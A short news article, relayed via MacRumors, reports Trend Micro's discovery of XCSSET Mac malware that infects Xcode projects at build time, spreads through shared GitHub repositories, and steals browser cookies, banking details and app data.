A new form of Mac malware, which can “command and control” a targeted computer is injected into Xcode projects. The new malware was discovered by security researchers at Trend Micro.
The researchers say the malware, which is part of the XCSSET family, as “an unusual infection related to Xcode developer projects.” The malware is unusual because it takes a different type of approach in infecting machines as it is injected into Xcode projects and when the project is built, the malicious code is run. Trend Micro says this leads to “a rabbit hole of malicious payloads.”
“This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.”
The malware was found to be capable of abusing Safari and other browsers to steal data. It uses a vulnerability to read and dump cookies, create backdoors in Javascript, and modify displayed websites. It can steal private banking information, block password change attempts, and steal newly changed passwords.
The malware is capable of stealing information from apps, including Notes, Skype, Evernote, WeChat, and others. It has the ability to encrypt files and display a ransom note, or quietly take screenshots, and upload files to a server of the attacker’s choice.
Developers may be unknowingly distributing the trojan to their users in the form of compromised Xcode projects and built applications. Trend Micro urges users to only download apps from official marketplaces and to ensure they have multi-layered security solutions in place.
(Via MacRumors)